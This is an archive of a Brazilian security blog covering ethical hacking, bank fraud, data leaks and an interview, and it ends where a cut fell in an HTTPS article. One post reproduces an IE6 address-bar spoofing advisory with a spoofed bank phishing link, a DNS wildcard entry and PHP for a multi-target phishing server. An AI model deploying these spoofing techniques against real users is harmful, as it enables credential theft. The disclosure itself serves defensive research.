blog.dennyroger.com.br

Por Denny Roger

Apesar de estarmos acostumados a ouvir casos de invasão de computadores praticados por hackers, a maioria destes ataques são, na realidade, realizadas pelos crackers. Atualmente a mídia impressa, eletrônica e audiovisual está utilizando o termo correto porque “hacker” transformou-se em uma profissão.

Os crackers são indivíduos que utilizam seu conhecimento para invadir computadores e roubar informações confidenciais. Geralmente essas informações são vendidas ou utilizadas para aplicar golpes na Internet.

Já o hacker é um indivíduo que utiliza seu conhecimento para testar os recursos de segurança instalados na empresa. Imagine a seguinte situação: você instalou um novo gerador de energia na sua empresa ou residência. É necessário testar este novo recurso contra a falta de energia elétrica. Você testa o novo gerador desligando a energia da sua empresa ou residência para verificar se o gerador é ativado e a energia é restabelecida. No mundo virtual o trabalho de um hacker é similar ao teste do gerador. Após a instalação de um controle de segurança, o hacker tenta realizar uma invasão ao sistema protegido para verificar se o controle de segurança foi instalado e configurado de forma correta. O hacker nunca invade um sistema com o intuito de causar danos.

O hacker é uma pessoa que tem um perfil autodidata. A maior parte das pessoas acredita que o hacker tem uma formação técnica. Ou seja, trata-se de uma pessoa que participou de cursos de graduação na área de tecnologia da informação ou formou-se em algum curso técnico relacionado a alguma tecnologia. Isso não é verdade! Por exemplo, o iPhone (smartphone desenvolvido pela Apple) foi lançado em 2007. Na época do seu lançamento a tecnologia foi considerada inovadora. A principio, só era possível utilizar a função de aparelho celular do iPhone em conjunto com a operadora AT&T nos Estados Unidos. O aparelho estava bloqueado para funcionar em outros países, incluindo o Brasil. Pouco tempo após o lançamento, o iPhone foi desbloqueado por brasileiros. Os responsáveis pelo desbloqueio não aprenderam na faculdade ou em cursos técnicos como desbloquear o iPhone. Isso ocorre porque os cursos não conseguem acompanhar o avanço da tecnologia.

O mercado reconhece o profissional rotulado como Hacker Ético pelo número de palestras que ministra, pelo número de artigos que publica, pelo número de cursos que ministra e pelo número de certificações obtidas. No meu ponto de vista as certificações são “títulos” exigidos pela sociedade. Na prática, o que diferencia o profissional é a sua capacidade de resolver problemas e interagir com a comunidade.

Existem equipes de Hackers Éticos nas instituições financeiras para testar a segurança dos recursos implementados no ambiente computacional do banco e na tecnologia de internet banking. Essas equipes são formadas por 3 ou mais profissionais. Todos os testes são gerenciados pelos profissionais responsáveis pelo sistema “alvo”. Ou seja, estamos falando de uma atividade interdepartamental. Isso ocorre porque um dos objetivos dos testes é verificar se o recurso disponibilizado pelo banco atende as leis, normas e boas práticas do mercado financeiro. Participam dos testes profissionais do departamento jurídico, recursos humanos, relações institucionais, marketing, tecnologia da informação, qualidade, etc.

Conclusão

O Hacker Ético irá avaliar a conformidade com a política de segurança, identificando ameaças e vulnerabilidades desconhecidas para a organização. O objetivo é minimizar o risco de crackers acessarem as informações confidencias da sua empresa.

Denny Roger é Engenheiro de Redes Sênior em Segurança da Informação, membro do Comitê Brasileiro sobre as normas de gestão da segurança da informação (série ISO 27000), especialista em análise de risco, projeto de rede segura e perícia forense. Contato: denny@dennyroger.com.br.

Fonte: Folha de Angola

Sem comentários »

by Amit Klein

IE6 is the second most popular web browser (after IE7), with market share of around 25% (according to recent surveys e.g. http://marketshare.hitslink.com/report.aspx?qprid=2).

This write-up presents two new phishing attack techniques, abusing an address bar issue (security vulnerability) with IE6 in combination with non-standard DNS domain names. The net result is that a phishing site may present itself via a link that when clicked in IE6 displays an almost indistinguishable URL from the one in used by the genuine site. The technique is new, i.e. it’s different than the ASCII similar characters and IDN homographs attacks.

There are two techniques: the first technique presents an address bar which is very similar (visually) to the address bar expected for the genuine domain, by abusing the NBSP character. The second technique presents an address bar visually identical to the one expected for the genuine domain, using the fact that a non-DNSish characters are not displayed in the address bar in some cases. This technique requires registration of a non-standard domain, hence it is probably theoretic only (although “site down” imitation is still possible).

The attacks were verified with Windows XP SP2 and Windows XP SP3.

Introduction

URLs typically include host name, which tells the browser (after DNS resolution) where to fetch the resource from. While regular host names contain alphanumeric characters (a-z, A-Z and 0-9), dots, hyphens and (in Intranets only) underscores, it is possible to construct (at least syntactically) URLs whose host part contain any octet (as explained in RFC 1035 section 3.1). The interpretation of such characters when presented as links (when IDN is not supported by the browser, see below) by the browser and by the DNS infrastructure, as well as the way those characters are presented by the browser (in the address bar) are the subject of this write-up.

Non-DNS characters can be provided to the browser in several ways (assuming e.g. an anchor HTML tag context):

* In raw form, i.e. as a byte (octet), e.g. $
* In HTML-encoded form, e.g. $
* In URL-encoded form, e.g. %24

In raw form, the data is provided as-is. In HTML-encoded form, the data is considered Unicode, and may undergo encoding. In URL- encoded format, the data is (again) directly decodable into raw form. The difference is subtle, but important. The octet values 00-7F (corresponding to the ASCII characters) have a single interpretation across all systems. However, octet values 80-FF may have different interpretation depending on the code page and encoding system in use.

Address bar spoofing in IE6

Non-DNS characters

Within the ASCII range (00-7F), only the DNS subset of ASCII characters is allowed. As for higher values (e.g. A9 or %A9): IE6 uses DnsQuery_A to resolve the name. DnsQuery_A assumes that the characters are in the “current” Windows ANSI codepage (e.g. Windows-1252 or Windows-1255, see http://www.microsoft.com/globaldev/reference/WinCP.mspx for a
list of Single Byte code pages). It translates the characters into UTF-8 representation and sends them this way. So %A9 is URL- decoded into the byte (\xA9) by IE6, then this raw byte is forwarded to DnsQuery_A, which interprets it according to the current codepage (e.g. Windows-1252 or Windows-1255) as COPYRIGHT_SIGN, moves to Unicode (U+00A9), and UTF-8 encodes this symbol (into the 2 byte sequence (\xC2) (\xA9)). The net result is that http://www.foo%A9bar.com goes out as a DNS query on www.foo(\xC2)(\xA9)bar.com. As it happens, almost all single-byte character sets (Windows-1250…Windows-1258) interpret (\xA9) as COPYRIGHT_SIGN, and the one exception being Windows-874 (Thai) which does not.

NOTE: the code page for a particular Windows box is determined through the Control Panel (Regional and Language Options -> advanced [tab], in the Languages for non-Unicode programs). The Windows ANSI code page is derived from the language specified via the table as provided in http://msdn.microsoft.com/en-us/library/ms776260.aspx. For example, if the language is English (all variants) then the Windows ANSI code page is 1252, whereas
if the language is Hebrew, then the Windows ANSI code page is 1255. As can be seen, the only languages whose code page is not Windows-1250…Windows-1258 are the far east languages Chinese, Japanese, Korean and Thai. So with the exception of these
languages, IE6 will request a DNS resolution for www.foo(\xC2)(\xA9)bar.com when it navigates to http://www.foo%A9bar.com/.

Attack #1: Raw/HTML-encoded characters

IE6 allows “raw” high-bit characters to be typed in the address bar, e.g.

http://www.foo(c)bar.com/

In such case, the character is displayed in the address bar (unlike %A9 which is not).

It is possible to present this URL in a link, e.g.:

http://www.foo©bar.com

NOTE: An HTML-encoded character is displayed as the corresponding Unicode symbol. However, if this symbol is not mapped to the
current code page, IE will not resolve the host name (it shows an “invalid syntax” error page).

A more interesting, and phishing related example is using the Non-Blocking Space character (NBSP, Unicode U+00A0). This character is rendered in the address bar as a space (NBSP is mapped as 0xA0 in all single-byte character set codepages, i.e. Windows-1250…Windows-1258 and Windows-874). Thus it opens up an address bar spoofing trick similar in effect to a one already disclosed (first reported in BugTraq December 2003: http://www.securityfocus.com/archive/1/346948, then picked up by CERT http://www.kb.cert.org/vuls/id/652278 and fixed by Microsoft as MS04-004).

For example, consider the following phishing link (mimicking www.yourbankhere.com, yet the real page is served from the domain phish.site):

href="http://www.yourbankhere.com     &n
bsp;          &
nbsp;          
   .       &nbs
p;          &nb
sp;          &n
bsp; .         
    .phish.site/">YourBankHere

It should be noted that auto-complete does work for these URLs.

When the address bar box is not wide enough to show the whole URL, the picture is almost identical to that of the genuine URL (notice there’s no slash after the host name, and the additional dots). When the address bar is at its full width, some users may still be fooled as the real domain is way off to the right, separated from the left part of the hostname by many white spaces. This shows up visually as (may wrap around in the text):

http://www.yourbankhere.com
. . .phish.site/

The attack can be easily implemented using DNS wildcard mapping, assuming the attacker controls the phish.site domain. The attacker simply needs to add the following line for the phish.site zone configuration file (tested with BIND9):

*.phish.site. IN A …IP address…

Note that the Host header will contain raw 0xA0 bytes. So by including the following PHP code in the index.php of the phishing server, the attacker can cater for multiple simultaneous phishing attacks:

$match=array();
preg_match("/^([a-zA-Z0-9_.-]+)\\xA0/",
$_SERVER['HTTP_HOST'],$match);
echo "This is a phishing site for ".$match[1];
?>

Attack #2 (theoretic): URL-encoded characters

It’s possible to include URL-encoded characters in the address bar of IE6. IE6 URL-decodes them before querying the DNS, and internally this is how they are kept.

Now, here’s where it gets interesting: high-bit characters will not be displayed in the address bar. So instead of showing visually as “http://www.foo%A9bar.com/” (or “http://www.foo(c)bar.com/”) as one may expect, the address bar will how “http://www.foobar.com/”.

Theoretically, this can be used for phishing. A phisher can register, say foo(\xC2)(\xA9)bar.com and use that in a phishing URL (http://www.foo%A9bar.com/). When clicked, the IE6 address bar will display the expected URL, http://www.foobar.com/. However, this vulnerability seems to be theoretic only, since (in the author’s limited experience), it’s not possible administratively to register such domain names.

As for domain security, as far as IE6 is concerned, these are two different domains. Cookies are not shared, access across domains is denied, SSL certificate will not match, etc. Also, the Host header includes the value with the original raw character - i.e. the Host header is:

Host: www.foo(\xA9)bar.com

Even if no real domain can be registered, this can still be somewhat of an annoyance. For example, spam can offer a URL as evidence that a company’s site is not available, or was hacked. So if an attacker wants to defame www.foobar.com, he may do so by sending spam with text such as “foobar inc. went chapter 11 - site is down. Check out http://www.foo%A9bar.com/”. This will end up in DNS resolution failure.

Auto-completion applies to the address bar string (not the real URL), hence auto-completing, say, www.fo will result in www.foobar.com (the real domain name), and the browser will navigate to the genuine site.

Vendor status

Microsoft (MSRC) was informed of the two issues on January 13th, 2008. MSRC acknowledged the two problems and assigned the first
one the ticket MSRC7899, and the second one MSRC7900. However, Microsoft declined to fix the issues.

Additional notes and observations

Label and name lengths

Labels are limited (per RFC 1034 section 2.3.4) to 63 octets. This means that no more than 31 consecutive NBSPs can be used. The trick is to split them into labels (by inserting a dot). Names are limited to 255 octets (per RFC 1034 section 2.3.4). This includes the accumulated length of all labels, plus a length octet preceding all labels (including the 0-length root label). Apparently, both restrictions are enforced by DnsQuery_A (in fact, names are limited to 254-256 bytes, including dots).

Additionally, it seems that a non-DNS character counts as 3 octets towards the total name limit (but not towards the label length limit). A possible explanation is that when a non-ASCII character is encountered, the worst case UTF-8 representation length is used (3 octets) rather than the actual UTF-8 rerpesentation length (2 bytes for characters whose Unicode index is smaller than 0x800 e.g. NBSP, 3 bytes for all other Unicode characters). Thus, it is impossible to use more than 85 such characters.

HTTP Caching

There seems to be an additional bug in IE6 regarding how resources whose URL contain high-bit set bytes are cached. The key URL is constructed in an erroneous manner. It seems that the key is constructed as following: take the string consisting of the URL-encoded URL, e.g. http://www.foo%A9bar.com/, and overwrite it with the decoded (shorter) URL, http://www.foo(\xA9)bar.com/, in this case resulting in
http://www.foo(\xA9)bar.comom/. Obviously no regular URL will match this key, so the caching is meaningless.

The key used for caching retrieval is probably the URL-encoded version of the URL. And since it’s never there, the effect is of no-caching.

DNS caching

It was also verified that BIND 9 (the most popular DNS server software) is capable of serving such domains, both as an authoritative server and as a caching DNS server (verified with BIND 9.2.4 as an authoritative and caching server, and 9.4.1-P1 as a caching server). In order to configure BIND to serve the domain as an authoritative name server, the high-bit bytes (\xC2)(\xA9) should be inserted to the zone file. Care should be exercised here with the choice of editor, since some text editors don’t handle high-bit bytes well. It is advised to review the
file contents with a hex-dump tool (e.g. od) to ensure that the correct bytes were entered.

Windows DNS server (verified with Windows 2003 for Small Business Server SP2) as a cache server also supports such domain names (no
testing was done regarding Windows DNS server as an authoritative server).

Root and TLD support

Apparently, the root servers and the .COM/.NET gTLD servers are indifferent to non-ASCII characters in sub-domains, and they will happily respond to such queries pointing at the authoritative DNS server (which would be the attacker’s server).

IDN and homographs

The first attack, while abusing the same underlying phenomenon (different logical symbols which are rendered into graphically identical or almost indistinguishable forms - SP and NBSP in our case) is nonetheless completely different than the homograph attack (http://www.shmoo.com/idn/homograph.txt), which makes use of the IDN extension to DNS.

The second (theoretic) attack is completely different because the non-DNS characters simply do not appear in the address bar.

Credit:The information has been provided by Amit Klein.

1 comentário »

by Denny Roger

As a teacher and senior network security engineer of computer security, I am often talk about security for internet banking. Over the last few years, I have taught how crackers works to a wide range of clients because they don’t know some type of attacks (e.g.: cross-site scripting, Google hacking, visual spoofing, link spoofing, SQL Injection, credit card cloning). This type of information can really make your internet banking access as safe as possible to protect your personal information and privacy.

Today, however, most banks from Brazil developed a number of tutorials of best practices about the most common frauds (e.g.: social engineer, phishing scam, Trojans). But, you need know others type of attacks for protect yourself when you use the internet banking service and the internet general.

I would like remember with you some threats and vulnerability about internet banking in Brazil.

Don’t forget! The internet banking developed in Brazil is one of more secure of the world.

These are some of my white papers and interviews:

O arsenal do cracker

Segredos do token

Novos golpes online

Identifique os golpes online

Banco Itaú é vítima de Cross Site Scripting

Unibanco é vítima de ataque

Banco Itaú, Unibanco e BB são clonados

Denny Roger - Veja o chat sobre banco online seguro

Segurança da informação: conscientizar para prevenir

Golpe online usa Bradesco para instalar cavalo-de-tróia

Bradesco é vítima de nova falsificação de site por crackers

Golpe: site clonado do Bradesco usa banco de dados de contas correntes

Site do Unibanco é clonado por crackers

Dispositivo de segurança do Unibanco gera alerta de cavalo-de-tróia

Site falso da Caixa Econômica rouba dados de internautas

Antivírus McAfee detectava ameaça falsa em serviço de Internet Baking e sites seguros

Pescaria virtual

Videos

Conheça o perfil do criminoso virtual

Novas técnicas de ataques virtuais

Please contact me, I will be happy to talk to you.

Denny Roger
denny@epsec.com.br

Sem comentários »

By Denny Roger

On October 9, Raviv Raz published a proof of concept tool about tests for SQL Injection via URL parameters.

Raviv Raz rebuilt Injector. The new name is MultiInjector. Here’s an update about Injector.

http://chaptersinwebsecurity.blogspot.com/2008/10/multiinjector.html

Have fun!!!

Denny Roger
denny@epsec.com.br

Sem comentários »

Por Tiago Souza

Este espaço é dedicado para um especial “Segurança da informação” e nada melhor do que iniciar com uma entrevista com o conceituado especialista em segurança Denny Roger.

Tive a oportunidade de conhecer o Denny em um pequeno evento na faculdade algum tempo atrás, apresentado pelo professor e amigo Charles Niza, o que me despertou maior interesse nessa área. Para quem não o conheçe segue um link do seu blog com informações: Blog Denny Roger.

Denny, obrigado pela colaboração com o Portal Tecnologia.
No final da entrevista constam alguns links interessantes.

1 – Nos conte um pouco de sua trajetória, sua formação e como surgiu seu interesse na área de segurança.

Denny Roger: Iniciei a minha carreira em 1995 desenvolvendo internet banking no Brasil. A oportunidade surgiu porque o meu pai trabalha com mainframes na área financeira e na época, ele ficou sabendo da abertura de vagas no banco e me convidou para participar do processo seletivo. Fui aprovado na entrevista técnica e iniciei a minha jornada de trabalho no segmento financeiro. Nesta primeira fase, o meu foco era fazer com que as strings utilizadas pelos modens sincronizassem com os modens do banco. Trabalhei durante 7 anos em 4 bancos no Brasil.

Em 1995 eu era aluno do curso superior em administração de empresas. Porém, investi um bom dinheiro na formação técnica em ambientes de rede Windows. Em 2002 participei do meu primeiro curso voltado para gestão em segurança da informação. Neste momento percebi que os cursos (tanto no Brasil quanto no exterior) não ensinavam muita coisa prática. Ou seja, os cursos não preparavam o profissional para atuar na área de segurança.

O que pude concluir é que não existem cursos no mundo capazes de acompanhar a evolução dos ataques na internet. A formação acadêmica não irá preparar o profissional que deseja atuar na área de segurança. Na faculdade não são ensinadas técnicas de visual ou link spoofing, engenharia reversa em vírus de computador, etc. Também não são apresentadas técnicas de defesa utilizando Web Application Firewall, por exemplo. Sendo assim, o profissional que pretende trabalhar na área de segurança da informação deve ter um perfil autodidata.

2 – Falando do mercado de trabalho, como é o mercado de segurança da informação, qual o papel do Security Officer e como ele atua no Brasil, há demanda para esse tipo de profissional?

DR: O profissional especializado em segurança da informação está em alta no Brasil. Isso ocorre porque existem tantos Crackers no Brasil que as empresas foram obrigadas a investir em segurança da informação. O internet banking que é desenvolvido no Brasil possui tantos recursos de segurança que é exportado para o mundo todo. Alguns ataques que são realizados por brasileiros, principalmente o roubo de senhas de internet banking, não são aplicados por Crackers de outros países. O brasileiro é muito criativo e a falta de uma legislação especifica sobre o assunto acaba ajudando os Crackers.

Algumas regulamentações estão contribuindo para o crescimento de vagas para profissionais de segurança. Isso está causando um efeito assustador. Estou comentando isso porque muitos Security Officers assumiram a gestão da segurança da informação sem possuírem experiência sobre o assunto. Ou seja, estou falando do profissional que atuava em alguma área da empresa e que por necessidade migrou para a área de segurança. Como conseqüência o departamento de segurança, recém criado, acaba utilizando os investimentos em recursos que não minimizam os verdadeiros riscos para o negócio da empresa. A culpa não é do “novo” Security Officer e sim do RH que não alocou um profissional com experiência para cuidar da gestão da segurança da informação.

Por causa da crise mundial que explodiu em outubro de 2008, as empresas estão analisando os recursos financeiros disponibilizados para a área de segurança e solicitando que não sejam realizados novos investimentos em 2009. Tudo isso por causa do prejuízo financeiro ocasionado por esta crise mundial. Ainda existem vagas em aberto para o cargo de Security Officer, porém, não sabemos como estará o mercado em 2009. Provavelmente as empresas irão reduzir ainda mais seus custos para recuperar os lucros que não foram obtidos em 2008 por causa da crise.

3 – Ainda referente ao mercado, quais os cursos e especializações que existem para se aprofundar na área de segurança e se tornar um especialista?

DR: Atualmente cada profissional que atua na área de segurança possui uma formação. Não existe um “padrão” neste segmento. A minha sugestão é que a pessoa interessada em trabalhar na área de segurança identifique em qual área tem mais facilidade em aprender. Por exemplo, algumas pessoas possuem mais facilidade em elaborar procedimentos e normas. Sendo assim, recomendo investir o seu tempo e dinheiro estudando a ISO da série 27000. Outras pessoas possuem mais facilidade em aprender sobre desenvolvimento de software em Assembler e C++. Essas pessoas devem procurar cursos específicos desta área. A mesma dica vale para quem trabalha com redes.

O mercado de trabalho não acredita no profissional generalista. Estou comentando isso porque algumas pessoas descrevem no currículo que conhecem UNIX, Windows, Firewall, Criptografia, Assembler, .NET, TCP/IP, DNS, etc. Por exemplo, só para estudar o Windows a pessoa precisaria de anos para conhecer a fundo esta tecnologia. O profissional genérico é rotulado pelo departamento de RH como funcionário “pato”: sabe nadar, voar e andar, mas não faz nada direito. Precisamos investir o nosso tempo na especialização do assunto que temos mais facilidade em aprender. É a melhor maneira de evoluir na carreira.

4 – Você acha que hoje em dia a área de segurança da informação já exerce um papel de importância que deveria ter nas empresas? Já há o investimento necessário nessa área?

DR: A área de segurança evoluiu muito nos últimos anos, principalmente quando começaram os ataques de engenharia social. Nesta época, as empresas presenciaram o vazamento de informações e começaram a dar mais atenção para o assunto.

Em 2005 algumas empresas alteraram seu organograma. A área de segurança da informação saiu da diretoria de TI ou Financeira para responder diretamente ao presidente da empresa.

Em 2007, o departamento de segurança da informação de algumas empresas mudou o nome para Gestão de Riscos. Tudo isso para atender normas do mercado.

Em 2008 ocorreu a migração do departamento de segurança da informação para a área de auditoria. Isso é muito estranho, porém, algumas empresas adotaram este tipo de mudança. O gestor da segurança responde para a diretoria de auditoria.

O ideal é a área de segurança estar na mesma posição que o departamento jurídico. O Security Officer deve responder ao presidente da empresa.

Em relação aos investimentos, o desafio que alguns Security Officers estão encontrando é justificar o investimento solicitado. O desenvolvimento da análise de risco pode ajudar a justificar o investimento. Isso ocorre porque serão mapeadas as ameaças para o processo de negócio da empresa e o valor do prejuízo caso não seja implementada uma contramedida. Caso o prejuízo seja maior que o valor da contramedida de segurança, a probabilidade de investimento na área é maior.

5 – Hoje com tanta informação na internet o usuário ainda clica em links maliciosos, o que está faltando, você tem alguma dica pessoal?

DR: As empresas perceberam que quanto mais controles de segurança são implementados, novos tipos de ataques surgem na internet. A maioria dos ataques relacionados a vazamento de informações depende da ajuda involuntária do usuário. Por exemplo, a pessoa precisa clicar no e-mail falso ou acessar a página clonada.

Há aproximadamente 2 anos, as empresas estão investindo nas campanhas de conscientização em segurança da informação. Estas campanhas têm como foco mudar o comportamento dos funcionários e minimizar riscos relacionados a e-mails falsos, páginas clones, instalação de softwares gratuito não homologados pela área de TI, etc.

As pessoas perceberam que os firewalls e antivírus passam uma falsa sensação de segurança. É importante ter instalados programas de segurança, porém, a atenção no momento da navegação na internet ajuda a minimizar os riscos.

É importante que as pessoas acessem o internet banking e e-mail pessoal e/ou profissional de computadores confiáveis. Não é recomendado utilizar computadores públicos ou da casa de amigos e parentes. O melhor é você acessar a sua conta corrente do computador da sua casa porque você sabe, ou deveria saber, o que está instalado no computador.

6 – Quais as formas de invasão e atuação de crackers que vemos hoje, principalmente no Brasil? Ainda há aquele papel do Engenheiro Social ou a questão é mais técnica?

DR: Atualmente os crackers estão focados em clonar cartões de crédito e roubar senhas e a chave de segurança (token) dos clientes do bancos.

No caso de clone do cartão de crédito são utilizados dispositivos em restaurantes, postos de gasolina e caixa eletrônico. Recomendo atenção redobrada quando entregamos o nosso cartão ao garçom do restaurante ou ao frentista do posto de gasolina. Neste momento é realizado o clone sem que o cliente perceba.

Os crackers voltaram a aplicar uma das técnicas mais antigas: o site clonado do banco. Esta técnica é utilizada para solicitar o recadastramento ou ativação do cartão/chave de segurança (token). A vítima informa todas as suas chaves de segurança para o site clonado.

7 – Como anda no Brasil a legislação e punição para crimes virtuais?

DR: Estão sendo criadas leis especificas para os crimes do “mundo virtual”. Atualmente as pessoas que comente algum tipo de crime utilizando o computador são enquadradas nos artigos 171 (estelionato), 155 (furto qualificado) e formação de quadrilha.

8 – Hoje há grande exposição da vida do usuário e das corporações nas redes sociais. Você acha que as redes sociais vêm para somar ou atrapalhar a vida dos usuários e das empresas?

DR: Estamos vivendo a época da geração Y. Estou falando das pessoas que nasceram “conectadas” a internet. Estas pessoas utilizam o mundo virtual para conversarem e trocar informações. O mais interessante é que a geração Y não utiliza o e-mail. São utilizados blogs, programas de mensagem instantânea, redes sociais e SMS para troca de informação. Ou seja, toda informação está exposta para qualquer pessoa na internet.

Algumas empresas tentam controlar a geração Y, o que é um erro. Outras empresas estão trabalhando em conjunto com esta geração e estão tendo muito sucesso.

Eu acredito que as normas internas e código de ética e conduta das empresas devem ser atualizadas.

As empresas não possuem recursos para controlar o vazamento de informações em redes sociais, blogs, etc. A conscientização é uma das ferramentas que as empresas devem utilizar para minimizar o risco e orientar as pessoas sobre como utilizar as redes sociais e blogs.

9 – Qual a importância da elaboração das políticas de segurança para as corporações? E como implementar uma política eficiente?

DR: A política de segurança é onde documentamos todas as diretrizes da empresa. Ou seja, tudo que é mandatório. Este documento deve ser elaborado por um comitê interdepartamental e com apoio da alta direção.

É necessário abordar os seguintes tópicos na política de segurança: diretrizes, classificação da informação e responsabilidades dos departamentos em relação a segurança da informação. Não devem ser tratados assuntos técnicos.

Após a elaboração da política de segurança o comitê inicia o processo de elaboração das normas de correio eletrônico, utilização de dispositivos móveis, acesso a internet, termo de responsabilidade, termo de sigilo, ações disciplinares, etc.

O próximo passo é a elaboração dos procedimentos relacionados a cada uma das normas.

Toda a documentação produzida pelo comitê é implementada na empresa com a ajuda do departamento de recursos humanos, marketing, TI e segurança da informação. Algumas empresas preferem solicitar que o funcionário assine o termo de responsabilidade declarando que leu e está de acordo com as novas regras. Outras empresas preferem realizar campanhas de conscientização sobre as novas normas e procedimentos. Existem casos em que a empresa apenas disponibiliza as informações na intranet.

10 – Quais recursos as empresas tem hoje para se proteger em relação a ataques, desde da Engenharia Social à ataques físicos?

DR: Antigamente os ataques eram baseados na camada de rede. As empresas implementaram firewalls, antivírus, sistemas de detecção de intrusos, anti-spam, criptografia e VPN contra este tipo de ataque.

Com tantos recursos de segurança implementados na rede, os atacantes iniciaram o envio de e-mails falsos e desenvolveram páginas clonadas para explorar o elo mais fraco da corrente, o ser humano. Estamos falando da engenharia social (a arte de enganar as pessoas).

Nos dias atuais, as empresas estão entendendo na prática o que significa “falsa sensação de segurança”. Os ataques são na camada de aplicação, passando por qualquer firewall, antivírus, sistema de detecção de intruso e criptografia. Ou seja, o atacante explora vulnerabilidades na aplicação utilizada pela empresa. Bancos de dados protegidos na rede corporativa estão sendo copiados através do servidor de aplicação que está na DMZ. Fotos estão sendo alteradas de forma indevida nas redes sociais através da manipulação da URL. Os sites de internet banking estão sendo vítimas de Cross Site Scripting.

A conclusão que podemos chegar é que os ataques não param de evoluir. As tecnologias de segurança não estão acompanhando a evolução dos ataques na internet. As empresas precisam investir em tecnologias conhecidas como Web Application Firewalls e Sigle Sign-on combinado com certificados digitais e tokens.

Recomendo que as empresas busquem conformidade com as boas práticas de segurança recomendadas pela ISO 27002 e ISO 15408 e realizem investimento em treinamento de segurança para equipes de desenvolvimento de software.

Abraços,
Denny Roger

Sites Relacionados:

EPSEC
Site Denny Roger
Blog Denny Roger
Coluna no Idg Now

Obrigado a todos pela colaboração e aguardem as novidades!

Tiago Souza

Fonte: http://www.portaltecnologia.net/especial-seguranca-da-informacao/

Sem comentários »

Conheça as técnicas mais utilizadas para o vazamento das informações. Por Denny Roger.

Quanto maior o número de controles implementados no computador de sua casa ou do seu escritório, novas técnicas serão utilizadas para burlar os sistemas de segurança.

Vamos conhecer as 5 principais ameaças relacionadas ao vazamento de informações pessoais e corporativas.

O disqueste

A primeira ameaça estava relacionada ao vazamento de informações através de disquetes. O funcionário da empresa recebia uma nova proposta de trabalho, pedia demissão e realizava uma cópia das informações para diversos disquetes. Para minimizar o risco, as equipes de suporte técnico removiam (fisicamente) o leitor de disquetes dos computadores da empresa.

O Zip Drive

O funcionário não tinha mais o dispositivo para disquetes. Sendo assim, passou a utilizar um novo tipo de dispositivo para armazenamento das informações, conhecido como Zip Drive. O problema é que este dispositivo é facilmente detectado pelas equipes de suporte técnico. Isso ocorre porque o Zip Drive é relativamente grande, deixando o dispositivo fisicamente exposto.

O e-mail

A terceira ameaça surgiu com a popularização do correio eletrônico. As informações da empresa literalmente fugiram do controle das equipes de TI. O e-mail tornou-se uma das principais ferramentas para o vazamento de informações. As empresas foram obrigadas a comprar tecnologias que controlam a utilização do e-mail e ajudam a reduzir o vazamento de informações.

O pendrive

Com o surgimento do pendrive, voltaram os problemas relacionados à época do disquete. Neste caso não é possível remover as entradas USB do computador porque são utilizadas pelos mouses, impressoras, etc.

Uma das soluções adotada foi a utilização da criptografia. Ou seja, a empresa permite a cópia das informações para o pendrive desde que estejam criptografadas. Dessa forma as informações só podem ser acessadas através dos computadores da empresa. Muitas empresas não possuem este tipo de recurso e o pen drive ainda é uma ameaça real.

A geração Y

Finalmente chegamos à época dos jovens que cresceram conectados na internet, conhecidos como a geração Y. Estas pessoas preferem se comunicar através de meio eletrônico (internet e celular, por exemplo).

Neste caso, os encontros presenciais são raros, tornando-se a principal ameaça para o vazamento de informações na internet. Isto ocorre porque utilizam blogs para descrever o seu dia-a-dia, marcam encontros ou contam as novidades através do Orkut, utilizam programas de mensagem instantânea para trocar informações de forma mais rápida e compartilham fotos através de álbuns disponíveis na internet.

As equipes de segurança da informação não conseguem controlar e monitorar as ferramentas pessoais utilizadas pela geração Y. Por exemplo, são publicadas informações corporativas no blog pessoal do funcionário. A empresa desconhece a existência deste blog e não possui tecnologia para detectar vazamento de informações corporativas na internet. O Orkut é rico em informações corporativas publicadas pela geração Y.

Estamos falando da aposentadoria do e-mail. As empresas controlam o vazamento de informações através do correio eletrônico. Porém, a geração Y deixou de lado este meio de comunicação porque necessita de comunicação instantânea. Preferem a troca de informações via SMS (mensagens de texto por celular), programas de mensagens instantâneas, sites de relacionamento e blogs. As empresas não atualizaram o código de conduta e a política de segurança para esta nova ameaça.

Conclusão

Os pais precisam orientar seus filhos a não conversarem com estranhos no mundo real e no mundo virtual. Existem casos de empresas vítimas de espionagem industrial, na qual o filho de um determinado diretor colaborou, sem perceber, com o vazamento de informações.

Recomendo a utilização de criptografia no computador pessoal. Você pode utilizar o Bcrypt (http://bcrypt.sourceforge.net/) para criptografar contratos, fotos, vídeos, etc. Este software é gratuito e de fácil utilização.

As empresas devem atualizar suas normas internas e orientar os novos funcionários sobre a divulgação de informações corporativas em blogs, sites de relacionamento, programas de mensagem instantânea, etc. Programas de conscientização tornam possível essa integração dos funcionários com as mudanças que estão acontecendo dentro da empresa em relação à segurança da informação.

Denny Roger é diretor da EPSEC, membro Comitê Brasileiro sobre as normas de gestão de segurança da informação (série 27000), especialista em análise de risco, projetos de redes seguras e perícia forense. E-mail: denny@epsec.com.br.

Fonte: http://idgnow.uol.com.br/seguranca/mente_hacker/idgcoluna.2008-10-14.9786163810/

Sem comentários »

Em agosto deste ano o russo Stanislaw Yurievich Pusep entrou em contato comigo para apresentar e discutir uma vulnerabilidade no HTTPS. Ele mora no Brasil desde 1994 e mesmo tendo abandonado a formação academica na área de ciência da computação, Stanislaw é um autoditada que ainda continua pesquisando sobre o assunto.

Sempre comento em minhas palestras que a característica mais forte para trabalhar na área de segurança é ser um autoditada. Isso ocorre porque não existe curso no mundo que consegue acompanhar a evolução da tecnologia. Os crackers já provaram que os mecanismos de segurança (firewall, antivírus, IDS/IPS, etc) também não conseguem acompanhar a evolução dos ataques na internet.

Recebi hoje o artigo escrito por Stanislaw sobre a vulnerabilidade no HTTPS e quero compartilhar a informação com os milhares de leitores deste blog e amigos da área de segurança da informação.

Quero aproveitar esta oportunidade para agradecer aos e-mails que tenho recebido de profissionais da área de segurança da informação dos EUA e Europa elogiando o conteúdo do blog, principalmente dos textos relacionados a segurança na aplicação. É interessante saber que os gringos utilizam o Google Translate para traduzir os textos do português para o inglês.

Abraços, Denny Roger (denny@epsec.com.br)

Por Stanislaw Pusep

Ineficiência do HTTPS/SSL em conteúdo estático e público

Vulnerabilidade:

A criptografia SSL, assim como muitos outros métodos, oculta somente a informação transmitida em si, preservando o tamanho dos pacotes de dados. Em vários casos, assim como em uma sessão comprimida e encriptada de VoIP, ou em um texto distorcido, contido numa imagem, é possível induzir o conteúdo criptografado utilizando métodos estatísticos.

